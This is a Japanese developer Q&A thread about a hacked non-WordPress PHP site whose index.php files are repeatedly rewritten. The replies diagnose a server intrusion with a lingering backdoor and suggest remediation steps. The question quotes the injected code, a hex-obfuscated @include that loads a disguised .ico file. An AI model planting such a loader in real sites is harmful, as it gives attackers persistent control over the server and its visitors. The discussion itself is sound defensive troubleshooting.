Q&A
>はじめにwordpressではありません。
何を前提としているのかわかりませんが、タグをつけていないので書かなくても伝わると思いますし、書くことで余計な詮索を強います。
はじめにwordpressではありません。
第2階層までのindex.phpに下記のような改竄が見られ
各フォルダ内にも下記の記述のあるindex.phpが作られている。
ウィルスに感染したようです。
パーミッションも705,604などに設定しており干渉できない状態ではあるのですが
ネット上には削除と更新で消えるとあるのですが
対象ファイルを更新し、不要ファイルを削除してもすぐに書き込まれており、バックドア型のウィルスのようです。
サイトをごそっと削除して入れ替えたら、消えるものなのでしょうか
よろしくお願いいたします
@include "\057home 中略 062.ico";
追記
ネットで調べたのは
ウェブサイト ウィルス @include
参考にしたサイト
https://its-office.jp/blog/wordpress/2017/09/14/wp-security.html
/*c93de*/ @include "\x2f\x68\x6f\x6d\x65\x2f\x70\x61\x74\x68\x2f\x6e\x61\x6d\x65\x2f\x70\x75\x62\x6c\x69\x63\x5f\x68\x74\x6d\x6c\x2f\x64\x69\x72\x2f\x66\x61\x76\x69\x63\x6f\x6e\x5f\x63\x38\x35\x61\x33\x62\x2e\x69\x63\x6f"; /*c93de*/ echo file_get_contents('index.html.bak.bak'); index.phpを書き換えられたパターンも同じようになっています。 さて、このようになった状態だと駆除が難しいと思いますのでデータだけエクスポートして後はすべて削除して入れ直すというのが一番なのですが、削除も出来ないバックアップもとっていなくて今あるデータのみの場合はデータ丸ごとをPCに保存します。大概のPCはウィルス対策ソフト入れていると思いますのでウィルス入りのデータに反応してウィルスのみ削除してくれます。 コード
申し訳ありません。
ネットで検索をするとwordpressの対処法ばかり出てくるので、wordpress以外での事例はそんなにないのかと思い記述しておきました
んー、それとこれとは違う話なので削っておいたほうが良い気がします。本当にウィルスならWordPressかどうかは関係ないですしね。
念のため、検索したキーワードと確認した記事を追記しておいてもらえますか?
同じ記事を参照先として提示することになると二度手間になりますし、質問者さんがやろうとしている方向性が見えます。
「セキュリティー」タグは附けておいたほうがいいかもしれません。
ウィルスじゃなくてサーバーに侵入されて書き換えられたってことですよね。
少なくとも「ウィルスに感染した」という言葉を使ってる限りは解決しないと思います。
ご指摘いただきましたところを追記、修正いたしました
そうですね。外からプログラムを書き換えるのは不可能なので、サーバーに乗り込まれてる可能性が高いです。
まずはサーバーパスワード変えるところから対応してみてください
自身で切り分けできないのであれば、見切りをつけて業者に依頼してください。
一般的な対処としては
・サーバの切り離し/ログ調査
・侵入経路判明後、該当箇所への対策を実施したサーバを再構築
・サービス再開/ログ監視
あたりになるかと思いますが、ご自身では無理だと思います。
回答2件
0
ウィルスに感染したようです。
厳密に言うとウイルスではないと思います。
パーミッションも705,604などに設定しており干渉できない状態ではあるのですが
パーミッションが705、604ということは、ファイルオーナーなら書き込みできるということですね。このパーミッションの付け方はレンタルサーバーに特有のものですが、レンタルサーバー上ということであっていますか?
もしもレンタルサーバーの場合は、PHPスクリプトはレンタルサーバーのユーザーの権限で動いていますから、外部からの攻撃者もこの権限を使うことができ、結果としてファイルの改ざんが可能です。
ネット上には削除と更新で消えるとあるのですが
その記事は半分間違いです。
参照された記事ですと、ファイルをパソコンにコピーすると、その段階でパソコン上のウイルス対策ソフトがウイルスを削除してくれるとありますが、冒頭にも書いたようにウイルスではないですし、改ざん部分をウイルス対策ソフトが削除する可能性は極めて低いです。
また、「更新」というのはWordPressやプラグインの更新を指すと思われすが、これをする理由は、これらソフトウェアを最新の状態にすることで、脆弱性のない状態にするためです。質問者さんがお使いのソフトウェアを、なんらかの方法で、脆弱性がない状態にしなければ、また侵入される可能性があります。
対象ファイルを更新し、不要ファイルを削除してもすぐに書き込まれており、バックドア型のウィルスのようです。
「バックドア型のウイルス」というより単にバックドアですね。またすぐに書き込まれる原因としては下記が考えられます。
- 別の場所にバックドアが残存している
- パスワードが推測されやすい状態になっている
- ウェブ上で動いているPHPスクリプトに脆弱性があり、再度それを悪用された
すべての原因を取り除かないと、いつまでも侵入を許すことになります。
サイトをごそっと削除して入れ替えたら、消えるものなのでしょうか
全順の通り、入れ替えた後のファイルに脆弱性があれば、何度でも改ざんされてしまいます。
投稿2020/03/19 03:36
総合スコア11701
0
自己解決
ありがとうございました。
業者に頼めとのことですので、ここでは解決できそうにありませんので閉じます。
投稿2020/03/19 02:31
総合スコア156
これ、除き見える範囲の情報で、ファイルアップロードとその実行ができるモノと想定されるので、ネットワークからの切り離しだけは業者探し以前にさっさと実行したほうが良いです。
個人のものかどうかでも違うのでは。
もしレンタルサーバーであればサーバー運営会社への調査依頼も必要でしょうし。
あなたの回答
tips
プレビュー
